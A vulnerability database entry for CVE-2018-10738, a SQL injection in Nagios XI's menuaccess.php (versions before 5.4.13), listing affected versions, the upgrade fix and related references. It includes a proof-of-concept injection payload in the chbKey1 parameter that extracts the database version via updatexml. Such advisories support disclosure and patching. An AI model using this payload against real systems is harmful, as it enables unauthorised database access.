Lucene search
KnownsecSSV:97268HistoryMay 04, 2018 - 12:00 a.m.
NagiosXI <= 5.4.12 menuaccess.php SQL injection(CVE-2018-10738)
2018-05-0400:00:00
Knownsec
www.seebug.org
15
0.037 Low
EPSS
Percentile
91.8%
NagiosXI <= 5.4.12 menuaccess.php SQL injection(CVE-2018-10738)
Description
A SQL injection issue was discovered in Nagios XI via the admin/menuaccess.php chbKey1parameter.
Affected Version
- Nagios XI 5.2.x
- Nagios XI 5.4.x before 5.4.13
Proof of concept
http://xxxx/nagiosql/admin/menuaccess.php
chbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1
Fix
Upgrade to version 5.4.13
Related
nuclei
nuclei
NagiosXI <= 5.4.12 menuaccess.php - SQL injection
2024-04-02 04:27:43
nvd
nvd
CVE-2018-10738
2018-05-16 13:29:00
cve
cve
CVE-2018-10738
2018-05-16 13:29:00
ubuntucve
ubuntucve
CVE-2018-10738
2018-05-16 00:00:00
cvelist
cvelist
CVE-2018-10738
2018-05-16 13:00:00
prion
prion
Sql injection
2018-05-16 13:29:00
openvas
openvas
Nagios XI Multiple Vulnerabilities (Apr 2018) - Active Check
2018-04-27 00:00:00